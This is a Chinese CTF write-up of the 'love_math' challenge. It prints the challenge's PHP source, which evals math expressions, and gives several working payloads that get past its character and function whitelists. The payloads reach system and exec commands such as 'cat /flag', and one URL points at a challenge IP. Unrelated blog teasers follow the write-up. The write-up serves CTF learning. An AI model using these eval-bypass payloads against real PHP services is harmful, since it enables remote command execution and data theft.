[CTF]攻防世界:love_math-平芜编程栈

题目：[CTF]攻防世界:love_math

学习点：php的动态函数、默认函数名使用

<?phperror_reporting(0);//听说你很喜欢数学，不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){show_source(__FILE__);}else{//例子 c=20-1$content=$_GET['c'];if(strlen($content)>=80){die("太长了不会算");}$blacklist=[' ','\t','\r','\n','\'','"','`','\[','\]'];foreach($blacklistas$blackitem){if(preg_match('/'.$blackitem.'/m',$content)){die("请不要输入奇奇怪怪的字符");}}//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp$whitelist=['abs','acos','acosh','asin','asinh','atan2','atan','atanh','base_convert','bindec','ceil','cos','cosh','decbin','dechex','decoct','deg2rad','exp','expm1','floor','fmod','getrandmax','hexdec','hypot','is_finite','is_infinite','is_nan','lcg_value','log10','log1p','log','max','min','mt_getrandmax','mt_rand','mt_srand','octdec','pi','pow','rad2deg','rand','round','sin','sinh','sqrt','srand','tan','tanh'];preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/',$content,$used_funcs);foreach($used_funcs[0]as$func){if(!in_array($func,$whitelist)){die("请不要输入奇奇怪怪的函数");}}//帮你算出答案eval('echo '.$content.';');}

给出源代码，让你构造出方法来拿到flag，看到白名单和黑名单及字符80长度限制。

步骤

1、长度太短，考虑用**$_GET[x]**。

$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];

[ ] 方括号被过滤，可以用{}尖括号代替。但是GET必须大写。

其中源代码中白名单函数可以利用的应该是base_convert函数，可以进行进制转换。

2、接下来考虑构造出$_GET[x]

现有：dechex （十进制转16进制）还需要一个 16进制转ascii （hex2bin）
通过base_convert十进制到36进制转换，得到hex2bin。

总的payload：http://61.147.171.35:65356/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=ls
解释：

base_convert(37907361743,10,36) => “hex2bin”
dechex(1598506324) => “5f474554” => hex2bin(5f474554) => _GET
$pi=_GET;
($$pi){pi}(($$pi){abs}) => ($_GET){pi}($_GET){abs} //{}可以代替[]

ascii 转 16

16进制转10

3、执行命令拿到flag

其实还有许多中方法，以下参考学习：

1、

$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})base_convert(696468,10,36)=>"exec"$pi(8768397090111664438,10,30)=>"getallheaders"exec(getallheaders(){1})//操作xx和yy，中间用逗号隔开，echo都能输出echo xx,yy

2、

//exec('hex2bin(dechex(109270211257898))') => exec('cat f*')($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))//system('cat'.dechex(16)^asinh^pi) => system('cat *')base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))

3、fuzz

<?php $payload=['abs','acos','acosh','asin','asinh','atan2','atan','atanh','bindec','ceil','cos','cosh','decbin','decoct','deg2rad','exp','expm1','floor','fmod','getrandmax','hexdec','hypot','is_finite','is_infinite','is_nan','lcg_value','log10','log1p','log','max','min','mt_getrandmax','mt_rand','mt_srand','octdec','pi','pow','rad2deg','rand','round','sin','sinh','sqrt','srand','tan','tanh'];for($k=1;$k<=sizeof($payload);$k++){for($i=0;$i<9;$i++){for($j=0;$j<=9;$j++){$exp=$payload[$k]^$i.$j;echo($payload[$k]."^$i$j"."==>$exp");echo"<br />";}}}http://XXX/?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag

智能脂肪秤PCBA开发设计方案开发公司

随着健康管理意识的普及，智能脂肪秤作为精准监测身体成分的智能终端，其核心的PCBA（印刷电路板组件）开发设计直接决定了产品的测量精度、稳定性与用户体验。在该领域，我司凭借多年深耕智能硬件PCBA开发的深厚积淀&#…

李华

稳石氢能荣获高工金球奖“AEM膜材料创新引领奖”

2025年12月5日，稳石氢能凭借对AEM膜材料降解机理的研究与膜材料的创新突破，荣获2025高工氢电“AEM膜材料创新引领奖”。阴离子交换膜是AEM制氢设备的核心部件，在实际电解过程中，由于运行条件带来的AEM膜降解问题严重影响了设备寿命…

李华

Llama-Factory与HuggingFace生态深度兼容，无缝衔接现有流程

Llama-Factory与HuggingFace生态深度兼容，无缝衔接现有流程在大模型落地加速的今天，一个现实问题困扰着许多企业团队：明明有高质量的数据和明确的应用场景，却因为微调流程复杂、技术门槛高而迟迟无法推进项目。研究人员熟悉算法原…

李华

云手机的存储空间可以灵活扩展吗？

云手机的存储空间通常可以灵活扩展，可通过升级存储套餐、多开实例等方式实现，许多云手机厂商提供了不同存储容量的套餐供用户选择，用户可通过 APP 或官网直接从低容量套餐升级至高容量套餐，按剩余时长补差价即可完成扩容&#xff…

李华

云手机一款多功能利器

云手机是基于 ARM 服务器虚拟化技术，在云端虚拟出的带有原生安卓操作系统的虚拟手机，堪称一款多功能利器，它具备多开应用、跨端协同等多种功能，可广泛应用于办公、娱乐等场景。传统手机受系统限制，同一应用通常只能安装…

李华

文件IO的常识

文件狭义文件：保存在磁盘上的文件广义文件：操作系统管理资源的一直形式固态硬盘，机械硬盘，内存，寄存器固态硬盘：优势是容量大TB级别，存储的数据可以持久化，劣势是读写速度很慢内部结…

李华